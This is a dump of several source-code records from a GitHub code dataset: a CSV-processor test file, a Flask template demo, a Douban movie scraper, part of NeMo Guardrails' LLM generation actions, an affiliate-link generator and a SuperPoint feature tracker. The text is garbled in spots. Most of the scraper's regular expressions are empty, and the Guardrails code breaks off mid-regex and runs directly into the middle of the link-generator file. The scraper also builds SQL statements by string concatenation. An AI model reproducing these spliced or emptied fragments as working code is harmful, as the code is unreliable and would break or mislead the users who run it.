patch(\"builtins.open\", update_cost_csv):\n with open(\"../test_data/simple.csv\", \"r\") as correct_file:\n test_lines = test_file.readlines()\n for test_line in test_lines:\n correct_line = correct_file.readline()\n #print(test_line)\n #print(correct_line)\n assert(test_line == correct_line)\n test_file.close()\n os.remove(\"../test_data/\" + destination_file)\n os.remove(\"../test_data/simple.csv\")\n\ndef test_update_column_value_kwargs(update_miles_csv):\n test_file = \"../test_data/simple.csv\"\n create_simple_csv(test_file)\n destination_file = \"update_column_test.csv\"\n data_file = DataFile(test_file)\n data_file.update_value(75000, 76000,\"Miles\", new_file_name=destination_file, Model=\"Camry\")\n test_file = open(\"../test_data/\" + destination_file, \"r\")\n with patch(\"builtins.open\", update_miles_csv):\n with open(\"../test_data/simple.csv\", \"r\") as correct_file:\n test_lines = test_file.readlines()\n for test_line in 
test_lines:\n correct_line = correct_file.readline()\n #print(test_line)\n #print(correct_line)\n assert(test_line.replace(\",\", \"\").replace(\"$\", \"\").replace('\"', \"\") == correct_line.replace(\",\", \"\").replace(\"$\", \"\").replace('\"', \"\"))\n test_file.close()\n os.remove(\"../test_data/\" + destination_file)\n os.remove(\"../test_data/simple.csv\")\n\n\n\n", "repo_name": "DevinDuval09/csv_processor", "sub_path": "csv_processor/tests/DataFileTests.py", "file_name": "DataFileTests.py", "file_ext": "py", "file_size_in_byte": 7177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "mock.mock_open", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 39, "usage_type": "call"}, {"api_name": "mock.mock_open", "line_number": 52, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 43, "usage_type": "call"}, {"api_name": "mock.mock_open", "line_number": 63, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 54, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 97, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 108, "usage_type": "call"}, {"api_name": "DataFile.DataFile.create", "line_number": 109, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 109, "usage_type": "name"}, {"api_name": "DataFile.DataFile", "line_number": 115, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 123, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 131, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 141, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 144, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 153, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 154, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 160, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 163, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 172, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "5508335903", "text": "# https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-ii-templates\n\nfrom flask import render_template\nfrom flask import Flask\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/')\ndef index(name):\n user = {'username': name}\n return render_template('index.html', title='Great!', user=user)\n", "repo_name": "umbcdata601/spring2020", "sub_path": "jupyter_notebooks/week_05_automation/flask_demo/html_from_template/my_flask.py", "file_name": "my_flask.py", "file_ext": "py", "file_size_in_byte": 317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "71373161448", "text": "# https://movie.douban.com/top250\n# 爬取豆瓣电影Top250的基本信息, 包括电源的名称, 豆瓣评分, 评价数, 电影概况, 电影链接等.\n\n# coding=utf-8\nfrom bs4 import BeautifulSoup # 网页解析, 获取数据\nimport re # 正则表达式, 进行文字匹配\nimport urllib.request, urllib.error # 指定URL, 
获取网页数据\nimport xlwt # 进行excel操作\nimport sqlite3 # 进行SQLite数据库操作\n\ndef main():\n baseurl = 'https://movie.douban.com/top250?start='\n # 1.爬取网页\n data_list = getData(baseurl)\n print(data_list)\n print(len(data_list))\n # print(len(data_list))\n save_path = './moviesTop250.xls'\n # 3.保存数据\n # saveData(save_path, data_list)\n saveDataToSQlite(data_list, 'movieTop250')\n\n\ndef askURL(url):\n # 伪装成浏览器\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.30\",\n \"Referer\": url\n }\n request = urllib.request.Request(url=url, headers=head)\n html = \"\"\n try:\n response = urllib.request.urlopen(request)\n html = response.read().decode('utf-8')\n # print(html)\n except urllib.error.URLError as e:\n print(e)\n return html\n\n# 正则表达式\nsuper_link = re.compile(r'') # 爬取超链接\nimg_link = re.compile(r'', re.S) # 爬取图片链接 re.S让换行符包含在连接中\ntitle = re.compile(r'(.*?)') # 电影名\nrate = re.compile(r'(.*?)') # 电影评分\njudge = re.compile(r'(.*?)人评价') # 评价人数\ninq = re.compile(r'(.*?)') # 电影概况\nBd = re.compile(r'

<p class=\"\">(.*?)</p>
', re.S) # 相关内容\n\n\n\ndef getData(baseurl):\n data_list = []\n for i in range(10):\n url = baseurl + str(i * 25)\n html = askURL(url)\n # 逐一解析网页\n soup = BeautifulSoup(html, 'html.parser')\n for item in soup.find_all('div', class_='item'):\n data = [] # 保存一部电影的所有信息\n item = str(item)\n # print(item)\n link = re.findall(super_link, item)[0] # 通过正侧表达式查找指定的字符串\n # print(link)\n data.append(link)\n data.append(re.findall(img_link, item)[0])\n data.append(re.findall(title, item)[0])\n data.append(re.findall(rate, item)[0])\n data.append(re.findall(judge, item)[0])\n data.append(\"\" if re.findall(inq, item) == [] else re.findall(inq, item)[0]) # 有可能为空\n data.append(re.findall(Bd, item)[0].replace(\" \", \"\"))\n\n data_list.append(data)\n\n return data_list\n\ndef saveData(save_path, data_list):\n workbook = xlwt.Workbook(encoding='utf-8') # 创建workbook对象\n worksheet = workbook.add_sheet('sheet1') # 创建工作表\n col = [\"电影详情链接\", \"图���链接\", \"中文名\", \"评分\", \"评价人数\", \"概况\", \"其他信息\"]\n for i in range(7):\n worksheet.write(0, i, col[i])\n for i in range(len(data_list)):\n for j in range(len(data_list[0])):\n worksheet.write(i+1, j, data_list[i][j])\n workbook.save(save_path)\n\ndef init_SQLite(dbpath):\n import sqlite3\n\n conn = sqlite3.connect(dbpath) # 打开或创建数据库文件\n print(\"Opened database successfully.\")\n\n cursor = conn.cursor() # 获取游标\n sql = ''' \n create table moviesTop250(\n id integer primary key autoincrement,\n super_link text not null,\n img_link text not null,\n name varchar not null,\n score numeric,\n num numeric,\n instroduction text,\n info text\n ) \n '''\n\n cursor.execute(sql)\n conn.commit() # 提交数据库操作\n\ndef saveDataToSQlite(data_list, dbpath):\n init_SQLite(dbpath)\n conn = sqlite3.connect(dbpath)\n cursor = conn.cursor()\n\n id = 1\n for data in data_list:\n # 拼写数据\n for index in range(len(data)):\n data[index] = '\"' + data[index] + '\"'\n sql = '''\n insert into moviesTop250 (\n id, super_link, img_link, name, score, num, instroduction, info)\n values (%s)\n '''%(f'\"{id}\",' + \",\".join(data))\n # print(sql)\n cursor.execute(sql)\n conn.commit()\n id += 1\n\n conn.close()\n\n\nif __name__ == '__main__':\n # askURL('https://baidu.com')\n main()", "repo_name": "yruns/Web_Crawler", "sub_path": "Moives/Movies.py", "file_name": "Movies.py", "file_ext": "py", "file_size_in_byte": 4653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.request.Request", "line_number": 30, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 30, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 30, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 33, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.request.error", "line_number": 36, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 36, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 41, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.S", "line_number": 42, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", 
"line_number": 46, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 47, "usage_type": "call"}, {"api_name": "re.S", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 57, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 62, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 65, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 66, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 67, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 69, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 70, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 77, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 90, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "70313852647", "text": "import asyncio\nimport logging\nimport random\nimport re\nimport sys\nimport threading\nimport uuid\nfrom ast import literal_eval\nfrom functools import lru_cache\nfrom time import time\nfrom typing import Callable, List, Optional\n\nfrom jinja2 import Environment, meta\nfrom langchain.llms import BaseLLM\n\nfrom nemoguardrails.actions.actions import ActionResult, action\nfrom nemoguardrails.actions.llm.utils import (\n flow_to_colang,\n get_first_nonempty_line,\n get_last_bot_intent_event,\n get_last_user_intent_event,\n get_last_user_utterance_event,\n get_multiline_response,\n get_retrieved_relevant_chunks,\n llm_call,\n strip_quotes,\n)\nfrom nemoguardrails.embeddings.index import EmbeddingsIndex, IndexItem\nfrom nemoguardrails.language.parser import parse_colang_file\nfrom nemoguardrails.llm.params import llm_params\nfrom nemoguardrails.llm.taskmanager import LLMTaskManager\nfrom nemoguardrails.llm.types import Task\nfrom nemoguardrails.patch_asyncio import check_sync_call_from_async_loop\nfrom nemoguardrails.rails.llm.config import EmbeddingSearchProvider, RailsConfig\nfrom nemoguardrails.utils import new_event_dict\n\nlog = logging.getLogger(__name__)\n\n\nclass LLMGenerationActions:\n \"\"\"A container objects for multiple related actions.\"\"\"\n\n def __init__(\n self,\n config: RailsConfig,\n llm: BaseLLM,\n llm_task_manager: LLMTaskManager,\n get_embedding_search_provider_instance: Callable[\n [Optional[EmbeddingSearchProvider]], EmbeddingsIndex\n ],\n verbose: bool = False,\n ):\n self.config = config\n self.llm = llm\n self.verbose = verbose\n\n # If we have user messages, we build an index with them\n self.user_message_index = None\n self.bot_message_index = None\n self.flows_index = None\n\n self.get_embedding_search_provider_instance = (\n get_embedding_search_provider_instance\n )\n\n if check_sync_call_from_async_loop():\n t = threading.Thread(target=asyncio.run, args=(self.init(),))\n t.start()\n t.join()\n else:\n asyncio.run(self.init())\n\n self.llm_task_manager = llm_task_manager\n\n # We also initialize the environment for rendering bot messages\n self.env = Environment()\n\n async def init(self):\n await asyncio.gather(\n self._init_user_message_index(),\n self._init_bot_message_index(),\n self._init_flows_index(),\n )\n\n async def _init_user_message_index(self):\n \"\"\"Initializes the index of user messages.\"\"\"\n\n if not self.config.user_messages:\n return\n\n items = []\n for intent, utterances in self.config.user_messages.items():\n for text in utterances:\n 
items.append(IndexItem(text=text, meta={\"intent\": intent}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.user_message_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.user_message_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.user_message_index.build()\n\n async def _init_bot_message_index(self):\n \"\"\"Initializes the index of bot messages.\"\"\"\n\n if not self.config.bot_messages:\n return\n\n items = []\n for intent, utterances in self.config.bot_messages.items():\n for text in utterances:\n items.append(IndexItem(text=intent, meta={\"text\": text}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.bot_message_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.bot_message_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.bot_message_index.build()\n\n async def _init_flows_index(self):\n \"\"\"Initializes the index of flows.\"\"\"\n\n if not self.config.flows:\n return\n\n items = []\n for flow in self.config.flows:\n # We don't include the default system flows in the index because we don't want\n # the LLM to predict system actions.\n if flow.get(\"id\") in [\n \"generate user intent\",\n \"generate next step\",\n \"generate bot message\",\n ]:\n continue\n\n # TODO: check if the flow has system actions and ignore the flow.\n\n colang_flow = flow.get(\"source_code\") or flow_to_colang(flow)\n\n # We index on the full body for now\n items.append(IndexItem(text=colang_flow, meta={\"flow\": colang_flow}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.flows_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.flows_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.flows_index.build()\n\n def _get_general_instruction(self):\n \"\"\"Helper to extract the general instruction.\"\"\"\n text = \"\"\n for instruction in self.config.instructions:\n if instruction.type == \"general\":\n text = instruction.content\n\n # We stop at the first one for now\n break\n\n return text\n\n @lru_cache\n def _get_sample_conversation_two_turns(self):\n \"\"\"Helper to extract only the two turns from the sample conversation.\n\n This is needed to be included to \"seed\" the conversation so that the model\n can follow the format more easily.\n \"\"\"\n lines = self.config.sample_conversation.split(\"\\n\")\n i = 0\n user_count = 0\n while i < len(lines):\n if lines[i].startswith(\"user \"):\n user_count += 1\n\n if user_count == 3:\n break\n\n i += 1\n\n sample_conversation = \"\\n\".join(lines[0:i])\n\n # Remove any trailing new lines\n sample_conversation = sample_conversation.strip()\n\n return sample_conversation\n\n @action(is_system_action=True)\n async def generate_user_intent(\n self, events: List[dict], llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate the canonical form for what the user said i.e. 
user intent.\"\"\"\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"UtteranceUserActionFinished\".\n event = get_last_user_utterance_event(events)\n assert event[\"type\"] == \"UtteranceUserActionFinished\"\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # TODO: check for an explicit way of enabling the canonical form detection\n\n if self.config.user_messages:\n # TODO: based on the config we can use a specific canonical forms model\n # or use the LLM to detect the canonical form. The below implementation\n # is for the latter.\n\n log.info(\"Phase 1: Generating user intent\")\n\n # We search for the most relevant similar user utterance\n examples = \"\"\n potential_user_intents = []\n\n if self.user_message_index:\n results = await self.user_message_index.search(\n text=event[\"final_transcript\"], max_results=5\n )\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"user \\\"{result.text}\\\"\\n {result.meta['intent']}\\n\\n\"\n potential_user_intents.append(result.meta[\"intent\"])\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_USER_INTENT,\n events=events,\n context={\n \"examples\": examples,\n \"potential_user_intents\": \", \".join(potential_user_intents),\n },\n )\n\n # We make this call with temperature 0 to have it as deterministic as possible.\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_USER_INTENT, output=result\n )\n\n user_intent = get_first_nonempty_line(result)\n if user_intent is None:\n user_intent = \"unknown message\"\n\n if user_intent and user_intent.startswith(\"user \"):\n user_intent = user_intent[5:]\n\n log.info(\n \"Canonical form for user intent: \"\n + (user_intent if user_intent else \"None\")\n )\n\n if user_intent is None:\n return ActionResult(\n events=[new_event_dict(\"UserIntent\", intent=\"unknown message\")]\n )\n else:\n return ActionResult(\n events=[new_event_dict(\"UserIntent\", intent=user_intent)]\n )\n else:\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERAL, events=events\n )\n\n # We make this call with temperature 0 to have it as deterministic as possible.\n result = await llm_call(llm, prompt)\n\n return ActionResult(\n events=[\n new_event_dict(\"StartUtteranceBotAction\", script=result.strip())\n ]\n )\n\n @action(is_system_action=True)\n async def generate_next_step(\n self, events: List[dict], llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate the next step in the current conversation flow.\n\n Currently, only generates a next step after a user intent.\n \"\"\"\n log.info(\"Phase 2 :: Generating next step ...\")\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"UserIntent\".\n event = get_last_user_intent_event(events)\n\n # Currently, we only predict next step after a user intent using LLM\n if event[\"type\"] == \"UserIntent\":\n user_intent = event[\"intent\"]\n\n # We search for the most relevant similar flows\n examples = \"\"\n if self.flows_index:\n results = await self.flows_index.search(text=user_intent, max_results=5)\n\n # We add these in reverse order so the most relevant is towards the 
end.\n for result in reversed(results):\n examples += f\"{result.text}\\n\\n\"\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_NEXT_STEPS,\n events=events,\n context={\"examples\": examples},\n )\n\n # We use temperature 0 for next step prediction as well\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_NEXT_STEPS, output=result\n )\n\n # If we don't have multi-step generation enabled, we only look at the first line.\n if not self.config.enable_multi_step_generation:\n result = get_first_nonempty_line(result)\n\n if result and result.startswith(\"bot \"):\n next_step = {\"bot\": result[4:]}\n else:\n next_step = {\"bot\": \"general response\"}\n\n # If we have to execute an action, we return the event to start it\n if next_step.get(\"execute\"):\n return ActionResult(\n events=[\n new_event_dict(\n \"StartInternalSystemAction\",\n action_name=next_step[\"execute\"],\n )\n ]\n )\n else:\n bot_intent = next_step.get(\"bot\")\n\n return ActionResult(\n events=[new_event_dict(\"BotIntent\", intent=bot_intent)]\n )\n else:\n # Otherwise, we parse the output as a single flow.\n # If we have a parsing error, we try to reduce size of the flow, potentially\n # up to a single step.\n lines = result.split(\"\\n\")\n while True:\n try:\n parse_colang_file(\"dynamic.co\", content=\"\\n\".join(lines))\n break\n except Exception as e:\n # If we could not parse the flow on the last line, we return a general response\n if len(lines) == 1:\n log.info(\"Exception while parsing single line: %s\", e)\n return ActionResult(\n events=[\n new_event_dict(\n \"BotIntent\", intent=\"general response\"\n )\n ]\n )\n\n log.info(\"Could not parse %s lines, reducing size\", len(lines))\n lines = lines[:-1]\n\n return ActionResult(\n events=[\n # We generate a random UUID as the flow_id\n new_event_dict(\n \"start_flow\",\n flow_id=str(uuid.uuid4()),\n flow_body=\"\\n\".join(lines),\n )\n ]\n )\n\n return ActionResult(return_value=None)\n\n def _render_string(\n self,\n template_str: str,\n context: Optional[dict] = None,\n ) -> str:\n \"\"\"Render a string using the provided context information.\n\n Args:\n template_str: The string template to render.\n context: The context for rendering.\n\n Returns:\n The rendered string.\n \"\"\"\n # First, if we have any direct usage of variables in the string,\n # we replace with correct Jinja syntax.\n for param in re.findall(r\"\\$([^ \\\"'!?\\-,; 0:\n if len(sh.row_values(rownum)[0]) > 0:\n data[domain] = sh.row_values(rownum)[0]\n\n\n return data\n\n def getLinkLinkPrice(self, key=None , url=None):\n if key is None or url is None:\n return False\n\n #url = urllib3.parse.quote_plus(url)\n\n return 'http://click.linkprice.com/click.php?m=%s&a=%s&l=9999&l_cd1=3&l_cd2=0&tu=%s' % (key, self.LINKPRICE_ID, url)\n\nif __name__ == \"__main__\":\n ppomppuLinkGenerator = PpomppuLinkGenerator()\n #print(ppomppuLinkGenerator.genLink(url='http://item.gmarket.co.kr/detailview/item.asp?goodscode=1401721949'))", "repo_name": "ko9ma7/crawler-1", "sub_path": "ppomppu_link_generator.py", "file_name": "ppomppu_link_generator.py", "file_ext": "py", "file_size_in_byte": 2003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "shortener.Shortener", "line_number": 16, "usage_type": "call"}, {"api_name": 
"shortener.genShortenerBitly", "line_number": 17, "usage_type": "call"}, {"api_name": "tldextract.extract", "line_number": 20, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 32, "usage_type": "call"}, {"api_name": "tldextract.extract", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "4960423192", "text": "import cv2\nimport copy\nimport numpy as np \nfrom time import time\n\nfrom utils.feature_process import PointTracker\nfrom utils.feature_process import SuperPointFrontend_torch, SuperPointFrontend\nrun_time = 0.0\nmatch_time = 0.0\n\nmyjet = np.array([[0. , 0. , 0.5 ],\n [0. , 0. , 0.99910873],\n [0. , 0.37843137, 1. ],\n [0. , 0.83333333, 1. ],\n [0.30044276, 1. , 0.66729918],\n [0.66729918, 1. , 0.30044276],\n [1. , 0.90123457, 0. ],\n [1. , 0.48002905, 0. ],\n [0.99910873, 0.07334786, 0. ],\n [0.5 , 0. , 0. ]])\n\n\nclass VisualTracker:\n\tdef __init__(self, opts, cams):\n\n\t\tself.forwframe_ = {\n\t\t\t\t'PointID': [],\n\t\t\t\t'keyPoint': np.zeros((3,0)),\n\t\t\t\t'descriptor': np.zeros((256,0)),\n\t\t\t\t'image': None,\n\t\t\t\t}\n\n\t\tself.curframe_ = {\n\t\t\t\t'PointID': [],\n\t\t\t\t'keyPoint': np.zeros((3,0)),\n\t\t\t\t'descriptor': np.zeros((256,0)),\n\t\t\t\t'image': None\n\t\t\t\t}\n\t\n\t\tself.camera = cams\n\t\tself.new_frame = None\n\t\tself.allfeature_cnt = 0\n\t\t\n\t\tself.cuda = opts.cuda\n\t\tself.scale = opts.scale\n\t\tself.max_cnt = opts.max_cnt\n\t\tself.nms_dist = opts.nms_dist\n\t\tself.nn_thresh = opts.nn_thresh\n\t\tself.no_display = opts.no_display\n\t\tself.width = opts.W // opts.scale\n\t\tself.height = opts.H // opts.scale\n\t\tself.conf_thresh = opts.conf_thresh\n\t\tself.weights_path = opts.weights_path\n\n\t\t# SuperPointFrontend_torch SuperPointFrontend\n\t\tself.SuperPoint_Ghostnet = SuperPointFrontend_torch(\n\t\t\tweights_path = self.weights_path, \n\t\t\tnms_dist = self.nms_dist,\n\t\t\tconf_thresh = self.conf_thresh,\n\t\t\tcuda = self.cuda\n\t\t\t)\n\t\t\n\t\tself.tracker = PointTracker(nn_thresh=self.nn_thresh)\n\n\tdef undistortedLineEndPoints(self, scale):\n\n\t\tcur_un_pts = copy.deepcopy(self.curframe_['keyPoint'])\n\t\tids = copy.deepcopy(self.curframe_['PointID'])\n\t\tcur_pts = copy.deepcopy(cur_un_pts * scale)\n\n\t\tfor i in range(cur_pts.shape[1]):\n\t\t\tb = self.camera.liftProjective(cur_pts[:2,i])\n\t\t\tcur_un_pts[0,i] = b[0] / b[2]\n\t\t\tcur_un_pts[1,i] = b[1] / b[2]\n\n\t\treturn cur_un_pts, cur_pts, ids\n\n\n\tdef readImage(self, new_img):\n\n\t\tassert(new_img.ndim==2 and new_img.shape[0]==self.height and new_img.shape[1]==self.width), \"Frame: provided image has not the same size as the camera model or image is not grayscale\"\n\t\t\n\t\tself.new_frame = new_img\n\n\t\tfirst_image_flag = False\n\n\t\tif not self.forwframe_['PointID']:\n\t\t\tself.forwframe_['PointID'] = []\n\t\t\tself.forwframe_['keyPoint'] = np.zeros((3,0))\n\t\t\tself.forwframe_['descriptor'] = np.zeros((256,0))\n\n\t\t\tself.forwframe_['image'] = self.new_frame\n\t\t\tself.curframe_['image'] = self.new_frame\n\t\t\tfirst_image_flag = True\n\n\t\telse:\n\t\t\tself.forwframe_['PointID'] = []\n\t\t\tself.forwframe_['keyPoint'] = np.zeros((3,0))\n\t\t\tself.forwframe_['descriptor'] = np.zeros((256,0))\n\n\t\t\tself.forwframe_['image'] = self.new_frame\n\t\t\n\t\t######################### 提取关键点和描述子 
############################\n\t\tprint('*'*10 + \" current frame \" + '*'*10)\n\t\tstart_time = time()\n\t\tself.forwframe_['keyPoint'], self.forwframe_['descriptor'], heatmap = self.SuperPoint_Ghostnet.run(self.new_frame, conf_thresh=0.015)\n\n\t\tglobal run_time\n\t\trun_time += ( time()-start_time )\n\t\tprint(\"run time is :\", run_time)\n\n\t\tkeyPoint_size = self.forwframe_['keyPoint'].shape[1]\n\t\tprint(\"current keypoint size is :\", keyPoint_size)\n\n\t\tif keyPoint_size < self.max_cnt-50:\n\t\t\tself.forwframe_['keyPoint'], self.forwframe_['descriptor'], heatmap = self.SuperPoint_Ghostnet.run(self.new_frame, conf_thresh=0.01)\n\t\t\tkeyPoint_size = self.forwframe_['keyPoint'].shape[1]\n\t\t\tprint(\"next keypoint size is \", keyPoint_size)\n\n\t\t\n\n\t\tfor _ in range(keyPoint_size):\n\t\t\tif first_image_flag == True:\n\t\t\t\tself.forwframe_['PointID'].append(self.allfeature_cnt)\n\t\t\t\tself.allfeature_cnt = self.allfeature_cnt+1\n\t\t\telse:\n\t\t\t\tself.forwframe_['PointID'].append(-1)\n\t\t\n\t\t##################### 开始处理匹配的特征点 ###############################\n\t\tif self.curframe_['keyPoint'].shape[1] > 0:\n\t\t\tstart_time = time()\n\t\t\tfeature_matches = self.tracker.nn_match_two_way( \n\t\t\t\t\t\t\t\t\tself.forwframe_['descriptor'], \n\t\t\t\t\t\t\t\t\tself.curframe_['descriptor'], \n\t\t\t\t\t\t\t\t\tself.nn_thresh\n\t\t\t\t\t\t\t).astype(int)\n\t\t\tglobal match_time\n\t\t\tmatch_time += time()-start_time\n\t\t\tprint(\"match time is :\", match_time)\n\t\t\tprint(\"match size is :\", feature_matches.shape[1])\n\t\t\t######################## 保证匹配得到的lineID相同 #####################\n\t\t\tfor k in range(feature_matches.shape[1]):\n\t\t\t\tself.forwframe_['PointID'][feature_matches[0,k]] = self.curframe_['PointID'][feature_matches[1,k]]\n\n\t\t\t################### 将跟踪的点与没跟踪的点进行区分 #####################\n\t\t\tvecPoint_new = np.zeros((3,0))\n\t\t\tvecPoint_tracked = np.zeros((3,0))\n\t\t\tPointID_new = []\n\t\t\tPointID_tracked = []\n\t\t\tDescr_new = np.zeros((256,0))\n\t\t\tDescr_tracked = np.zeros((256,0))\n\n\t\t\tfor i in range(keyPoint_size):\n\t\t\t\tif self.forwframe_['PointID'][i] == -1 :\n\t\t\t\t\tself.forwframe_['PointID'][i] = self.allfeature_cnt\n\t\t\t\t\tself.allfeature_cnt = self.allfeature_cnt+1\n\t\t\t\t\tvecPoint_new = np.append(vecPoint_new, self.forwframe_['keyPoint'][:,i:i+1], axis=1)\n\t\t\t\t\tPointID_new.append(self.forwframe_['PointID'][i])\n\t\t\t\t\tDescr_new = np.append(Descr_new, self.forwframe_['descriptor'][:,i:i+1], axis=1)\n\t\t\t\telse:\n\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, self.forwframe_['keyPoint'][:,i:i+1], axis=1)\n\t\t\t\t\tPointID_tracked.append(self.forwframe_['PointID'][i])\n\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, self.forwframe_['descriptor'][:,i:i+1], axis=1)\n\n\t\t\t########### 跟踪的点特征少于150了,那就补充新的点特征 ###############\n\n\t\t\tdiff_n = self.max_cnt - vecPoint_tracked.shape[1]\n\t\t\tif diff_n > 0:\n\t\t\t\tif vecPoint_new.shape[1] >= diff_n:\n\t\t\t\t\tfor k in range(diff_n):\n\t\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, vecPoint_new[:,k:k+1], axis=1)\n\t\t\t\t\t\tPointID_tracked.append(PointID_new[k])\n\t\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, Descr_new[:,k:k+1], axis=1)\n\t\t\t\telse:\n\t\t\t\t\tfor k in range(vecPoint_new.shape[1]):\n\t\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, vecPoint_new[:,k:k+1], axis=1)\n\t\t\t\t\t\tPointID_tracked.append(PointID_new[k])\n\t\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, Descr_new[:,k:k+1], 
